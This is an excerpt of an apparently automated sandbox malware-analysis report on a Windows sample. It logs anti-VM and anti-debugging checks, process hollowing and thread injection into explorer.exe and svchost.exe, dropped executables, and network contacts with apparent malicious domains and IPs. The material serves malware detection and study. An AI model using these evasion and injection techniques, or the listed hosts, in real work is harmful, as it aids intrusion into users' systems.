                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00406AA0
                      Found evasive API chain (may stop execution after checking computer name)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\System32\svchost.exe TID: 6680Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\8058.exe TID: 5688Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6248Thread sleep count: 41 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6248Thread sleep time: -41000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 561
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeAPI coverage: 0.3 %
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeAPI coverage: 5.9 %
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00406AA0
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D9EC.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\54D0.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4955.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6E36.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1523.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\74DE.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6471.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2205.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\13C.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2D8F.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeEvaded block: after key decision
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeAPI call chain: ExitProcess graph end node
                      Source: explorer.exe, 00000004.00000000.279552948.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                      Source: WerFault.exe, 0000001B.00000003.406682814.000000000548F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                      Source: explorer.exe, 00000004.00000000.280593120.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
                      Source: explorer.exe, 00000004.00000000.280593120.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000004.00000000.279552948.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000006.00000002.567765167.000002717EE5F000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                      Source: explorer.exe, 00000004.00000000.263925522.00000000089B5000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}PS0
                      Source: svchost.exe, 00000006.00000002.543608482.000002717D629000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW /
                      Source: svchost.exe, 00000006.00000002.567503250.000002717EE52000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.411996831.000000000542B000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.409119888.000000000542A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.408591760.0000000005422000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000004.00000000.287942603.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                      Source: explorer.exe, 00000004.00000000.280593120.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}sets
                      Source: explorer.exe, 00000004.00000000.279618255.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                      Source: explorer.exe, 00000004.00000000.290664995.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                      Source: explorer.exe, 00000004.00000000.280593120.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}les
                      Source: WerFault.exe, 0000001B.00000003.408920884.0000000005498000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.412119669.0000000005498000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.409044949.0000000005498000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWh+C
                      Source: explorer.exe, 00000004.00000000.279618255.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                      Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.542213071.0000026E7CE2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00419C64 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00419E04 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\ttfssdiSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00435AD0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0073C84B push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00640042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_0217092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_02170D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\ttfssdiProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0042C050 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0042CF12 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00419EAD SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeMemory protected: page guard
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_004288C0 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0043ADB0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00422EA0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00423040 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_0042C1F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00428A60 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_0043AF50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.101.24.0 25
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE files
                      Source: C:\Windows\explorer.exeFile created: 1523.exe.4.dr
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\ttfssdiSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\ttfssdiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 2EE0000 protect: page execute and read and write
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeMemory written: C:\Users\user\AppData\Local\Temp\6B9B.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeMemory written: C:\Users\user\AppData\Local\Temp\8058.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EE0000 value starts with: 4D5A
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeThread created: C:\Windows\explorer.exe EIP: 30E1930
                      Source: C:\Users\user\AppData\Roaming\ttfssdiThread created: unknown EIP: 5DE1930
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeThread created: unknown EIP: B611930
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EE0000
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30A5008
                      .NET source code references suspicious native API functions
                      Source: 8058.exe.4.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.2.8058.exe.d00000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.0.8058.exe.d00000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
